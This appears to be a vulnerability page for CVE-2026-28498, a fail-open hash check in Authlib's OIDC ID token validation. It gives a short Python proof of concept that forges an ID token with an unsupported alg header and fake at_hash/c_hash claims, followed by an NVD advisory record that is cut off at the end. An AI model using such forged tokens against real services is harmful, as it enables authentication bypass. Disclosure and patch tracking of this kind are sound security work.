CVE-2026-28498

#!/usr/bin/env python3 """ CVE-2026-28498 Proof of Concept Authlib OIDC ID Token Hash Verification Bypass This PoC demonstrates the fail-open behavior in Authlib's _verify_hash function. """ import json import base64 import time def create_fake_id_token(payload, alg='none'): """ Create a fake ID Token with unsupported alg to bypass hash verification. """ # Token structure: header.payload.signature header = { 'alg': alg, # Use unsupported algorithm 'typ': 'JWT' } # Add hash claims that won't be properly verified payload['at_hash'] = 'fake-access-token-hash' payload['c_hash'] = 'fake-auth-code-hash' # Base64url encode header_b64 = base64.urlsafe_b64encode( json.dumps(header).encode() ).rstrip(b'=').decode() payload_b64 = base64.urlsafe_b64encode( json.dumps(payload).encode() ).rstrip(b'=').decode() # Use empty signature for 'none' algorithm sig_b64 = '' if alg == 'none' else 'fake-signature' return f"{header_b64}.{payload_b64}.{sig_b64}" def exploit(): """ Demonstrate the vulnerability. """ # Standard valid payload structure payload = { 'iss': 'https://auth.example.com', 'sub': 'user123', 'aud': 'client-id-12345', 'exp': int(time.time()) + 3600, 'iat': int(time.time()) } # Create token with unsupported alg fake_token = create_fake_id_token(payload, alg='UNSUPPORTED_ALG') print(f"[+] Created fake ID Token: {fake_token[:50]}...") print(f"[+] Token contains unsupported alg: UNSUPPORTED_ALG") print(f"[+] at_hash and c_hash contain arbitrary values") print("[+] Authlib will fail-open and accept this token!") return fake_token if __name__ == '__main__': exploit()

{"cve": {"id": "CVE-2026-28498", "sourceIdentifier": "[email protected]", "published": "2026-03-16T18:16:07.717", "lastModified": "2026-03-17T20:40:37.573", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a library-level vulnerability was identified in the Authlib Python library concerning the validation of OpenID Connect (OIDC) ID Tokens. Specifically, the internal hash verification logic (_verify_hash) responsible for validating the at_hash (Access Token Hash) and c_hash (Authorization Code Hash) claims exhibits a fail-open behavior when encountering an unsupported or unknown cryptographic algorithm. This flaw allows an attacker to bypass mandatory integrity protections by supplying a forged ID Token with a deliberately unrecognized alg header parameter. The library intercepts the unsupported state and silently returns True (validation passed), inherently violating fundamental cryptographic design principles and direct OIDC specifications. This issue has been patched in version 1.6.9."}, {"lang": "es", "value": "Authlib es una biblioteca Python que construye servidores OAuth y OpenID Connect. Antes de la versión 1.6.9, se identificó una vulnerabilidad a nivel de biblioteca en la biblioteca Python Authlib con respecto a la validación de los tokens de ID de OpenID Connect (OIDC). Específicamente, la lógica interna de verificación de hash (_verify_hash) responsable de validar las reclamaciones at_hash (Hash de Token de Acceso) y c_hash (Hash de Código de Autorización) exhibe un comportamiento fail-open al encontrar un algoritmo criptográfico no compatible o desconocido. Esta falla permite a un atacante eludir las protecciones de integridad obligatorias al suministrar un token de ID falsificado con un parámetro de encabezado alg deliberadamente no reconocido. La biblioteca intercepta el estado no compatible y devuelve silenciosamente True (validación aprobada), violando inherentemente los principios fundamentales de diseño criptográfico y las especificaciones directas de OIDC. Este problema ha sido parcheado en la versión 1.6.9."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-354"}, {"lang": "en", "value": "CWE-573"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:authlib:authlib:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.6.9", "matchCriteriaId": "8C677FEC-2094-49D8-ABAB-F740B6F83D38"}]}]}], "references": [{"url": "https://github.com/authlib/authlib/commit/b9bb2b25bf8b7e01512d847a95c1749646eaa72b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/authlib/authlib/releases/tag/v1.6.9", "source": "[email protected]", "tags": ["Product", "Release Note ... (truncated)